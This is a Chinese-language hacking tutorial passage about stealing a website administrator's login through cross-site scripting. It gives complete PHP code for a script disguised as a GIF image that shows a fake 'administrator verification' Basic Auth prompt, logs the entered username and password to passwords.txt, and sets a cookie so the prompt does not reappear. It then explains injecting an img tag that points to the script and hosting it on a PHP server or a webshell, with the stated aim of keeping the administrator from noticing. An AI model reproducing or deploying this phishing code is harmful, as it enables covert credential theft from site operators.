为了不让管理员发现，我们用图片来伪装了。好了，那我们就来看看利用程序吧！代码如下：
    ★
    <?
    header("Content-type: image/gif");
    $image = imagecreatefromgif('mellow.gif');
    if(!$_COOKIE['LOGON'])
    {
    $login = $_SERVER['PHP_AUTH_USER'];
    $pass = $_SERVER['PHP_AUTH_PW'];
    if(strlen($pass) <= 4 || !$login)
    {
    Header('HTTP/1.1 401 Unauthorized');
    Header('WWW-Authenticate: Basic realm="管理员验证 - login"');
    }
    elseif($login)
    {
    setcookie('LOGON',md5($pass));
    $f = fopen('passwords.txt', 'ab');
    fwrite($f, $login." ||| ".$pass."\r\n");
    fclose($f);
    }
    }
    imagegif($image);
    imagedestroy($image);
    ?>
    ★

    新建个文档，把代码保存在文件内，后缀名改成图片格式。然后去网上找个小型的图片文件。将这两个图片放在同一个目录下就OK了。★$image = imagecreatefromgif('mellow.gif');★这里就是调用的正常图片文件！然后我们在跨站那里输入<img src="图片地址">，如果成功的话，就会生成个passwords.txt文件，文件内记录着管理员输入的帐号和密码！废话不少说了，现在我们来演示下吧，可能有的人说？管理一般都在后台进行留言管理的。很少跑到前台的，其实后台也要调用那文件。只要管理员进了后台，进行留言管理就能利用的。另外不要搞错哦，那代码是PHP的，要在PHP环境下才能正常解析！如果大家没有PHP的空间，去找个支持PHP的Webshell也行。大家看到没，出现了登陆框，不精明的网管会以为是程序的验证。那么，他就会输入帐号和密码再次进行验证。刷新下，密码框就不会出现。除非你删除你机子上的cookie才行。这样迷域性更大了，如图9